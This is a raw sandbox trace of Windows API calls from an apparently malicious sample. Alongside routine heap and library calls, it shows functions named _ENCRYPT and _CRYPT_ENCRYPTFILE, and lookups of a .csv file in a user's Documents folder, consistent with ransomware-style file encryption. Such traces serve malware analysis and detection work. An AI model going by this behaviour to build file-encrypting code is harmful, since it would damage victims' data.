1 [0180.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0180.263] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0180.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0180.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0180.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0180.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0180.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0180.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0180.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0180.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0180.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0180.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.264] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0180.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0180.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0180.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd780, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0180.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.265] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0180.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0180.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0180.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0180.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0180.265] CloseHandle (hObject=0x120) returned 1 [0180.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0180.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0180.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0180.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0180.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0180.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0180.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0180.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0180.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0180.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0180.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0180.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0180.266] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0180.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0180.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0180.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0180.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0180.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0180.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0180.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0180.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0180.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0180.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0180.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0180.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0180.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0180.267] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0180.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0180.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0180.267] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.267] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0180.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0180.267] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.267] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.267] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0180.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.268] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.268] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0180.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0180.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0180.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0180.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.268] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.268] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0180.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0180.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.268] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0180.268] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0180.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.269] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0180.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0180.269] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.269] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa07c2050, ftCreationTime.dwHighDateTime=0x1d5e47a, ftLastAccessTime.dwLowDateTime=0x19f5cf50, ftLastAccessTime.dwHighDateTime=0x1d5e2b7, ftLastWriteTime.dwLowDateTime=0x19f5cf50, ftLastWriteTime.dwHighDateTime=0x1d5e2b7, nFileSizeHigh=0x0, nFileSizeLow=0x5acd, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="zw2wea8 QxA.csv", cAlternateFileName="ZW2WEA~1.CSV")) returned 0x90add8 [0180.271] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.271] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.271] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa07c2050, ftCreationTime.dwHighDateTime=0x1d5e47a, ftLastAccessTime.dwLowDateTime=0x19f5cf50, ftLastAccessTime.dwHighDateTime=0x1d5e2b7, ftLastWriteTime.dwLowDateTime=0x19f5cf50, ftLastWriteTime.dwHighDateTime=0x1d5e2b7, nFileSizeHigh=0x0, nFileSizeLow=0x5acd, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="zw2wea8 QxA.csv", cAlternateFileName="ZW2WEA~1.CSV")) returned 0x90add8 [0180.272] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.272] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.272] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zw2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.273] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0180.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ea8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8 QxA.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0180.274] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.274] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0180.274] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0180.274] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0180.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.274] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.274] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0180.274] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0180.274] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0180.274] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0180.274] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.274] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.csv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa07c2050, ftCreationTime.dwHighDateTime=0x1d5e47a, ftLastAccessTime.dwLowDateTime=0x19f5cf50, ftLastAccessTime.dwHighDateTime=0x1d5e2b7, ftLastWriteTime.dwLowDateTime=0x19f5cf50, ftLastWriteTime.dwHighDateTime=0x1d5e2b7, nFileSizeHigh=0x0, nFileSizeLow=0x5acd, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="zw2wea8 QxA.csv", cAlternateFileName="ZW2WEA~1.CSV")) returned 0x90af58 [0180.275] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0180.275] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0180.275] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0180.275] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0180.275] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0180.275] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, 